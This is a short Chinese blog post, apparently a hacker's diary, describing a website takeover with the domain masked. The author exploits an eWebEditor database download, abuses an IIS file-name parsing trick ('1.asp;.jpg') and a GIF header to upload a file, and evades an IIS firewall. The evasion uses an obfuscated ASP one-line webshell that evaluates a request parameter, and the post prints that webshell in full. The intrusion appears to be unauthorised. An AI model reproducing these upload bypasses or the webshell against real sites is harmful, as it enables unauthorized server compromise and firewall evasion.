实记绕过IIS防火墙思路

今年头一次拿站还是很顺利的,在上传的地方遇到了一些阻碍其他都比较顺利,先前的一些步骤都省略了,下面具体记录上传时遇到IIS防火墙绕过的一些思路。
首先找到了ewebeditor:

http://www.xxxxx.com/Web_Admin/htmledit/

下载mdb,然后解密顺利进入后台,不出所料的可以遍历无法修改样式,这里补充一下,"s_full"样式的目录不存在,所以无法远程下载,遍历翻到了上传点:

http://www.xxxxx.com/Web_Admin/include/uppic.asp

先找正常图片上传观察一下:

可惜的是被拦截了:

顺手测试了一下"1.aspx"不会被拦截,但是不支持aspx,后来结合分号成功绕过(“1.asp;.jpg”),直接上传一句话会提示"文件格式不正确",所以加上"GIF89ax"头,之后又被IIS防火墙拦截提示:

当前发送的内容中可能包含“一句话木马”而被IIS防火墙禁止!

找个变形的一句话成功搞定:

<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))(“bs”))%>

文章没有太多叙述,但是真实测试中肯定不会这么快反应过来,所以还是得积累经验。

没有评论:

发表评论